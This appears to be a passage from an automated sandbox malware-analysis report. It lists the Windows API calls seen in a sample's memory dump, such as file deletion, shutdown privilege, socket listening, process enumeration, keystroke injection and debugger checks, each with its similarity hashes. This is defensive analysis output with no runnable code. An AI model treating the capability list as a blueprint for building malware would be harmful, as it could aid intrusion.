            • FindNextFileW.KERNEL32(00000000,?), ref: 010196D3
            • FindClose.KERNEL32(00000000), ref: 010196DE
            • FindFirstFileW.KERNEL32(*.*,?), ref: 010196FA
            • SetCurrentDirectoryW.KERNEL32(?), ref: 0101974A
            • SetCurrentDirectoryW.KERNEL32(01066B7C), ref: 01019768
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 01019772
            • FindClose.KERNEL32(00000000), ref: 0101977F
            • FindClose.KERNEL32(00000000), ref: 0101978F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
            • String ID: *.*
            • API String ID: 1409584000-438819550
            • Opcode ID: 570f0f1bd7966804e7b9efdd685813808e37549eb3bbb415f78af1e607d1441e
            • Instruction ID: d858339a1a238c45dff683b91b547b7f2966c40888a7e40d5530903a51f3887a
            • Opcode Fuzzy Hash: 570f0f1bd7966804e7b9efdd685813808e37549eb3bbb415f78af1e607d1441e
            • Instruction Fuzzy Hash: 8131FB325006196EEF24EFB9DD19EDE7BECAF49224F00459AF985E3094D739D980CB20
            APIs
            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 010197BE
            • FindNextFileW.KERNEL32(00000000,?), ref: 01019819
            • FindClose.KERNEL32(00000000), ref: 01019824
            • FindFirstFileW.KERNEL32(*.*,?), ref: 01019840
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01019890
            • SetCurrentDirectoryW.KERNEL32(01066B7C), ref: 010198AE
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 010198B8
            • FindClose.KERNEL32(00000000), ref: 010198C5
            • FindClose.KERNEL32(00000000), ref: 010198D5
              • Part of subcall function 0100DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0100DB00
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Similarity
            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
            • String ID: *.*
            • API String ID: 2640511053-438819550
            • Opcode ID: 445fbd22c4de93b92921c1dc21cc6351b3cc1930b26f117eeb61a922ca070cf3
            • Instruction ID: 0c68d92e566b69d414a6f56e74025084ab86932abbed94e92345929e6e4c6264
            • Opcode Fuzzy Hash: 445fbd22c4de93b92921c1dc21cc6351b3cc1930b26f117eeb61a922ca070cf3
            • Instruction Fuzzy Hash: 9D31EC31500219AEFF20DFB9DC54ADE7BEC9F45224F10419AED94F2094D739D985CB20
            APIs
            • GetLocalTime.KERNEL32(?), ref: 01018257
            • SystemTimeToFileTime.KERNEL32(?,?), ref: 01018267
            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01018273
            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01018310
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018324
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018356
            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0101838C
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018395
            Similarity
            • API ID: CurrentDirectoryTime$File$Local$System
            • String ID: *.*
            • API String ID: 1464919966-438819550
            • Opcode ID: ea96e1ed5678cad329c4dd0ad104d1250f441a9cfe2e264687a463186c79ec48
            • Instruction ID: 576d95074c4188f58028d68f253fce575682d9ffb4bee390d8880db2e80de802
            • Opcode Fuzzy Hash: ea96e1ed5678cad329c4dd0ad104d1250f441a9cfe2e264687a463186c79ec48
            • Instruction Fuzzy Hash: BA619BB25083059FD710EF64C8449AEB3E8FF89314F08895EF989D7251DB39EA45CB92
            APIs
              • Part of subcall function 00FA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA3A97,?,?,00FA2E7F,?,?,?,00000000), ref: 00FA3AC2
              • Part of subcall function 0100E199: GetFileAttributesW.KERNEL32(?,0100CF95), ref: 0100E19A
            • FindFirstFileW.KERNEL32(?,?), ref: 0100D122
            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0100D1DD
            • MoveFileW.KERNEL32(?,?), ref: 0100D1F0
            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0100D20D
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100D237
              • Part of subcall function 0100D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0100D21C,?,?), ref: 0100D2B2
            • FindClose.KERNEL32(00000000,?,?,?), ref: 0100D253
            • FindClose.KERNEL32(00000000), ref: 0100D264
            Similarity
            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
            • String ID: \*.*
            • API String ID: 1946585618-1173974218
            • Opcode ID: 1ac16151235a28d3c06d52f92c338823b880882840f1f52edb9c3e83ec31a88f
            • Instruction ID: 82837c88b0846e01de50a66ce536c5fdbd73b20d35f414aa3571276d42eef465
            • Opcode Fuzzy Hash: 1ac16151235a28d3c06d52f92c338823b880882840f1f52edb9c3e83ec31a88f
            • Instruction Fuzzy Hash: D9618E7180511DABEF06EBE4DE529EDB7B9AF25300F2040A5E44273191EB39AF09DB60
            Similarity
            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
            • String ID:
            • API String ID: 1737998785-0
            • Opcode ID: b91cb3640de6f909d6a2f68f1bf0845a3282300aa0f7458474a48a985a9e858d
            • Instruction ID: b5d77441de52cf7c1581803d846ad6dd607f40e0ebbde0726c3dfa23f82d7efa
            • Opcode Fuzzy Hash: b91cb3640de6f909d6a2f68f1bf0845a3282300aa0f7458474a48a985a9e858d
            • Instruction Fuzzy Hash: 8341BF35604611AFE321DF29D588F19BBE5FF44318F04C099E89A9B6A6C73AFC41CB90
            APIs
              • Part of subcall function 010016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0100170D
              • Part of subcall function 010016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0100173A
              • Part of subcall function 010016C3: GetLastError.KERNEL32 ref: 0100174A
            • ExitWindowsEx.USER32(?,00000000), ref: 0100E932
            Similarity
            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
            • String ID: $ $@$SeShutdownPrivilege
            • API String ID: 2234035333-3163812486
            • Opcode ID: f99a937e75e87237cd5d79fffe9cc2cca2259b58ec7cb325a82ff74b5ac6b193
            • Instruction ID: 78be48224caa5fd4468ee7a0fa459039acd7a4a86a38222e692d2b7925ded817
            • Opcode Fuzzy Hash: f99a937e75e87237cd5d79fffe9cc2cca2259b58ec7cb325a82ff74b5ac6b193
            • Instruction Fuzzy Hash: 8C01D673610211ABFBA666B8DD85BFF729CA714750F054D66FDC2F21C1D6A55C4082A0
            APIs
            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01021276
            • WSAGetLastError.WSOCK32 ref: 01021283
            • bind.WSOCK32(00000000,?,00000010), ref: 010212BA
            • WSAGetLastError.WSOCK32 ref: 010212C5
            • closesocket.WSOCK32(00000000), ref: 010212F4
            • listen.WSOCK32(00000000,00000005), ref: 01021303
            • WSAGetLastError.WSOCK32 ref: 0102130D
            • closesocket.WSOCK32(00000000), ref: 0102133C
            Similarity
            • API ID: ErrorLast$closesocket$bindlistensocket
            • String ID:
            • API String ID: 540024437-0
            • Opcode ID: 37383c436352a7e263eaeff4e6df7e475f4db40477ce582fce3ffe44bb66a582
            • Instruction ID: 1a0c1be53ef648fcac77088f8c4fbedd7ff984fc1aa6b9fb5a27eaaf2060ed70
            • Opcode Fuzzy Hash: 37383c436352a7e263eaeff4e6df7e475f4db40477ce582fce3ffe44bb66a582
            • Instruction Fuzzy Hash: 2541A5716001109FE720DF28C584B29BBE6BF46314F1880C9E9969F297C775ED85CBE1
            APIs
              • Part of subcall function 00FA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA3A97,?,?,00FA2E7F,?,?,?,00000000), ref: 00FA3AC2
              • Part of subcall function 0100E199: GetFileAttributesW.KERNEL32(?,0100CF95), ref: 0100E19A
            • FindFirstFileW.KERNEL32(?,?), ref: 0100D420
            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0100D470
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100D481
            • FindClose.KERNEL32(00000000), ref: 0100D498
            • FindClose.KERNEL32(00000000), ref: 0100D4A1
            Similarity
            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
            • String ID: \*.*
            • API String ID: 2649000838-1173974218
            • Opcode ID: 7d0dafe762f5dc1aeb13b0fc24223ccadd0c837b8a419a846c7d4f0ff9b19a34
            • Instruction ID: b66d0d5b6bdbafa11609518f6b459b22d963a4b3a2816f71efe874964471b7d4
            • Opcode Fuzzy Hash: 7d0dafe762f5dc1aeb13b0fc24223ccadd0c837b8a419a846c7d4f0ff9b19a34
            • Instruction Fuzzy Hash: EA3180B100C3419FD311EFA4D8918EFB7ECAE96200F444A1EF4D593191EB29AA09D763
            Similarity
            • API ID: __floor_pentium4
            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
            • API String ID: 4168288129-2761157908
            • Opcode ID: 2f3da188fb4ae81aca61575032d55fa1a11259ccb3692a57e4a278262842f2db
            • Instruction ID: 15266cbc255ef9bb8f51671372de751ba79bbbf96df0fbdf90688b0653066a1f
            • Opcode Fuzzy Hash: 2f3da188fb4ae81aca61575032d55fa1a11259ccb3692a57e4a278262842f2db
            • Instruction Fuzzy Hash: 86C24C72E046298BDB25DF28DD40BE9B7B6EB44314F1841EBD44EE7240D778AE85AF40
            APIs
            • _wcslen.LIBCMT ref: 010164DC
            • CoInitialize.OLE32(00000000), ref: 01016639
            • CoCreateInstance.OLE32(0103FCF8,00000000,00000001,0103FB68,?), ref: 01016650
            • CoUninitialize.OLE32 ref: 010168D4
            Similarity
            • API ID: CreateInitializeInstanceUninitialize_wcslen
            • String ID: .lnk
            • API String ID: 886957087-24824748
            • Opcode ID: c010ac0f7e8efcd1818cd4aa04fda7c6ad16dfc8bab58a6d059165585ccdf784
            • Instruction ID: 28ad5c6acd2d188a7001d1cdca4f433b49e216df746268eac7dba345089e6d77
            • Opcode Fuzzy Hash: c010ac0f7e8efcd1818cd4aa04fda7c6ad16dfc8bab58a6d059165585ccdf784
            • Instruction Fuzzy Hash: 4ED136B1508201AFD304EF24CC81A6BB7E8EF99704F04896DF5958B295EB75E905CBA2
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 01019B78
            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 01019C8B
              • Part of subcall function 01013874: GetInputState.USER32 ref: 010138CB
              • Part of subcall function 01013874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01013966
            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 01019BA8
            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 01019C75
            Similarity
            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
            • String ID: *.*
            • API String ID: 1972594611-438819550
            • Opcode ID: 30ef2d48da841cb156789f78eb38012e0dfe144c497cf9f1e9edf17a8d2bc9cc
            • Instruction ID: 1c0582c64fead1f5cf3c460fc2e66f5e0663611e85732777ad455002934c5987
            • Opcode Fuzzy Hash: 30ef2d48da841cb156789f78eb38012e0dfe144c497cf9f1e9edf17a8d2bc9cc
            • Instruction Fuzzy Hash: A041B17180420E9FDF54DF68C995AEE7BF8FF05304F10409AE885A2194EB399A84CF60
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FB9A4E
            • GetSysColor.USER32(0000000F), ref: 00FB9B23
            • SetBkColor.GDI32(?,00000000), ref: 00FB9B36
            Similarity
            • API ID: Color$LongProcWindow
            • String ID:
            • API String ID: 3131106179-0
            • Opcode ID: fb53160a0263bda19451c5d883e6241c5b0cbd4c7f41e500fb720e514ea3332b
            • Instruction ID: 6a1815989f0ecc13c2a7ef9d0b5536c692b431ecd8295e697f6d23391131926b
            • Opcode Fuzzy Hash: fb53160a0263bda19451c5d883e6241c5b0cbd4c7f41e500fb720e514ea3332b
            • Instruction Fuzzy Hash: 51A12B72A0C508AEE724BA3E8C48FFB765DDF82360B144109F742D66D5CAA99D01FB71
            APIs
              • Part of subcall function 0102304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0102307A
              • Part of subcall function 0102304E: _wcslen.LIBCMT ref: 0102309B
            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0102185D
            • WSAGetLastError.WSOCK32 ref: 01021884
            • bind.WSOCK32(00000000,?,00000010), ref: 010218DB
            • WSAGetLastError.WSOCK32 ref: 010218E6
            • closesocket.WSOCK32(00000000), ref: 01021915
            Similarity
            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
            • String ID:
            • API String ID: 1601658205-0
            • Opcode ID: e25adb235705bb972f53d8208f2521ad7f4c58c8308136f25dc4664e27ea11c2
            • Instruction ID: a1307a7b014a1d2b467512297012473bf429739838d5a09dc8863b13c72437ad
            • Opcode Fuzzy Hash: e25adb235705bb972f53d8208f2521ad7f4c58c8308136f25dc4664e27ea11c2
            • Instruction Fuzzy Hash: 22519571A00210AFEB10EF24C886F6A77E5AF45718F088498F959AF3C7D775ED418BA1
            APIs
            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0101CF38
            • InternetReadFile.WININET(?,00000000,?,?), ref: 0101CF6F
            • GetLastError.KERNEL32(?,00000000,?,?,?,0101C21E,00000000), ref: 0101CFB4
            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0101C21E,00000000), ref: 0101CFC8
            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0101C21E,00000000), ref: 0101CFF2
            Similarity
            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
            • String ID:
            • API String ID: 3191363074-0
            • Opcode ID: add4c519d4f05468ee3f44d20453646d72dc0c9c4a7ef989a3882966623b23d9
            • Instruction ID: 40096aadc3849c70ff5586c71ef2143699bd9fda43932de6357b0b73bb878668
            • Opcode Fuzzy Hash: add4c519d4f05468ee3f44d20453646d72dc0c9c4a7ef989a3882966623b23d9
            • Instruction Fuzzy Hash: 80315E71540205EFFB20DFA9CA84AAFBBFCEB14350B10446EF596E2145DB38EA45DB60
            Similarity
            • API ID: Window$EnabledForegroundIconicVisibleZoomed
            • String ID:
            • API String ID: 292994002-0
            • Opcode ID: f68252fe098f7b97b0cb41ff05d24dbdd2d495c4b84dc7340918d29b80653ada
            • Instruction ID: 1f7f8713c4055d3e480ffeef1877a7b27dd05afc637edc53426b0933d75afb79
            • Opcode Fuzzy Hash: f68252fe098f7b97b0cb41ff05d24dbdd2d495c4b84dc7340918d29b80653ada
            • Instruction Fuzzy Hash: F921D6317102055FE7219F1AC844B5A7BEDEFC9314F1880A9E8C5DB341C776D842CB90
            Similarity
            • API ID:
            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
            • API String ID: 0-1546025612
            • Opcode ID: 5e7b32fb628c17da67be2575ea099a89678b59f804e82aa2e1824dcad0f20642
            • Instruction ID: c3e15aa3d7307387badfbf13df50455670e0924809da2eb9a1baa13529abc541
            • Opcode Fuzzy Hash: 5e7b32fb628c17da67be2575ea099a89678b59f804e82aa2e1824dcad0f20642
            • Instruction Fuzzy Hash: 32A2B1B1E0025ACBDF24CF59C8407AEB7B1BF55764F2481AAD815A7380DB749D82EF90
            APIs
            • CreateToolhelp32Snapshot.KERNEL32 ref: 0102A6AC
            • Process32FirstW.KERNEL32(00000000,?), ref: 0102A6BA
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • Process32NextW.KERNEL32(00000000,?), ref: 0102A79C
            • CloseHandle.KERNEL32(00000000), ref: 0102A7AB
              • Part of subcall function 00FBCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00FE3303,?), ref: 00FBCE8A
            Similarity
            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
            • String ID:
            • API String ID: 1991900642-0
            • Opcode ID: d28666cd44c6b9cb0fbc89f15cce4ab9c9b945e14f32fb5ed742a7b3542ac719
            • Instruction ID: 9f7eb9858fc71b59527d8dae68f00340ff7ea1410f6af949439bfb3d613cf210
            • Opcode Fuzzy Hash: d28666cd44c6b9cb0fbc89f15cce4ab9c9b945e14f32fb5ed742a7b3542ac719
            • Instruction Fuzzy Hash: 4F516BB1508310AFD710EF24CC86A6BBBE8FF89754F00892DF58997251EB74E904DB92
            APIs
            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0100ABF1
            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0100AC0D
            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0100AC74
            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0100ACC6
            Similarity
            • API ID: KeyboardState$InputMessagePostSend
            • String ID:
            • API String ID: 432972143-0
            • Opcode ID: 3e4a929e25374401e51ac7a5e1d49624bbe497d731a5028105e949465ac06cb1
            • Instruction ID: 609ff1526e1edab7087ba5bd9daa4d05ce7920618a8b3da55499043ec43d8867
            • Opcode Fuzzy Hash: 3e4a929e25374401e51ac7a5e1d49624bbe497d731a5028105e949465ac06cb1
            • Instruction Fuzzy Hash: F231F430B0475CEFFF378A698808FFE7AE5AB89324F05425AE4C9971D1C37989858751
            APIs
            • _free.LIBCMT ref: 00FDBB7F
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • GetTimeZoneInformation.KERNEL32 ref: 00FDBB91
            • WideCharToMultiByte.KERNEL32(00000000,?,0107121C,000000FF,?,0000003F,?,?), ref: 00FDBC09
            • WideCharToMultiByte.KERNEL32(00000000,?,01071270,000000FF,?,0000003F,?,?,?,0107121C,000000FF,?,0000003F,?,?), ref: 00FDBC36
            Similarity
            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
            • String ID:
            • API String ID: 806657224-0
            • Opcode ID: 03ef0f4ffe5b26e9cbf148d7144fa811b6990becd5f837ff6da84edaf320a2e0
            • Instruction ID: d67da08177583d88ad4073894a79d31f286c30ba204d1dddad2a5d1e090d0712
            • Opcode Fuzzy Hash: 03ef0f4ffe5b26e9cbf148d7144fa811b6990becd5f837ff6da84edaf320a2e0
            • Instruction Fuzzy Hash: 7631C0B1D04205EFCB21DF69CC8192DBBBAFF4536071942ABE090EB3A5D7359911EB50
            APIs
            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 010082AA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: lstrlen
            • String ID: ($|
            • API String ID: 1659193697-1631851259
            • Opcode ID: 527bd47c67160e1cff7f9eed15f1adb6fe9726d30de314e5de05f6c098db0658
            • Instruction ID: e016a87eb4625b2b1a97a1f6bdfbee6691729ee333257cfecdf60ca0b8c7a867
            • Opcode Fuzzy Hash: 527bd47c67160e1cff7f9eed15f1adb6fe9726d30de314e5de05f6c098db0658
            • Instruction Fuzzy Hash: 2D322574A007059FDB29CF59C481AAAB7F0FF48310B15C5AEE59ADB3A1EB70E941CB44
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 00FD271A
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FD2724
            • UnhandledExceptionFilter.KERNEL32(?), ref: 00FD2731
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 7575418c1a8a814bc3997902138cc9c6554117450e82454132084851b2cbbece
            • Instruction ID: bed9a81b2c9cf81d1f9728e97a59c8f133aa20c160bbe90a889ad832794f1d50
            • Opcode Fuzzy Hash: 7575418c1a8a814bc3997902138cc9c6554117450e82454132084851b2cbbece
            • Instruction Fuzzy Hash: 3E31D57590121DABCB61DF64DD89B9CBBB8AF18310F5041EAE81CA7260EB349F859F44
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 010151DA
            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 01015238
            • SetErrorMode.KERNEL32(00000000), ref: 010152A1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$DiskFreeSpace
            • String ID:
            • API String ID: 1682464887-0
            • Opcode ID: c3f2f3f72b2f5a83d37c288bb935bf6e5f784c44b5aa9e3b9adcf72d20194cba
            • Instruction ID: 07a94c6d4bd7e1d2da953b53175b4a7973de02f5b8ff24e6ccdc7521f91c8292
            • Opcode Fuzzy Hash: c3f2f3f72b2f5a83d37c288bb935bf6e5f784c44b5aa9e3b9adcf72d20194cba
            • Instruction Fuzzy Hash: 50312D75A00118DFDB00DF54D884EADBBF4FF4A314F048099E945AB356D736E855CBA0
            APIs
              • Part of subcall function 00FBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FC0668
              • Part of subcall function 00FBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FC0685
            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0100170D
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0100173A
            • GetLastError.KERNEL32 ref: 0100174A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
            • String ID:
            • API String ID: 577356006-0
            • Opcode ID: bc0649cfbbfe7fa7b48d8c18827139e11c2ae6bbf98d5577bce44cacac123e7e
            • Instruction ID: ba87268c90b848930ca220b163e946d54d08861ebbe820ab97e6292bfd4a51e8
            • Opcode Fuzzy Hash: bc0649cfbbfe7fa7b48d8c18827139e11c2ae6bbf98d5577bce44cacac123e7e
            • Instruction Fuzzy Hash: 2F1194B1504304AFE7189F54DD86DAAB7FDFB44714B10852EF09697281EB75FC458B20
            APIs
            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0100D608
            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0100D645
            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0100D650
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseControlCreateDeviceFileHandle
            • String ID:
            • API String ID: 33631002-0
            • Opcode ID: 7f1bebced09a41c160b12d8a79f1161d6f59eeaf208d291407f7b3b54d6c73ef
            • Instruction ID: 8991eadb53240c8036b728f120a669618fdabd7b16cedbd87521dd1cc73a3ff1
            • Opcode Fuzzy Hash: 7f1bebced09a41c160b12d8a79f1161d6f59eeaf208d291407f7b3b54d6c73ef
            • Instruction Fuzzy Hash: 50117C71E01228BBEB208F999C44FAFBFBCEB49B50F108152F904E7280C2704A018BA1
            APIs
            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0100168C
            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 010016A1
            • FreeSid.ADVAPI32(?), ref: 010016B1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocateCheckFreeInitializeMembershipToken
            • String ID:
            • API String ID: 3429775523-0
            • Opcode ID: 5a9ba7bd82154d50ebc663d9d66457799f6eecfe2101be13a90788083b5102fd
            • Instruction ID: f13818b33eb92118051a2240e83392da7c6407b658bbff042e3fe7f997c30f3f
            • Opcode Fuzzy Hash: 5a9ba7bd82154d50ebc663d9d66457799f6eecfe2101be13a90788083b5102fd
            • Instruction Fuzzy Hash: 1EF0F47195030DBBEB00DFE49989AAEBBBCEB09604F5045A5E501E2181E775AA448B50
            APIs
            • GetCurrentProcess.KERNEL32(00FD28E9,?,00FC4CBE,00FD28E9,010688B8,0000000C,00FC4E15,00FD28E9,00000002,00000000,?,00FD28E9), ref: 00FC4D09
            • TerminateProcess.KERNEL32(00000000,?,00FC4CBE,00FD28E9,010688B8,0000000C,00FC4E15,00FD28E9,00000002,00000000,?,00FD28E9), ref: 00FC4D10
            • ExitProcess.KERNEL32 ref: 00FC4D22
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
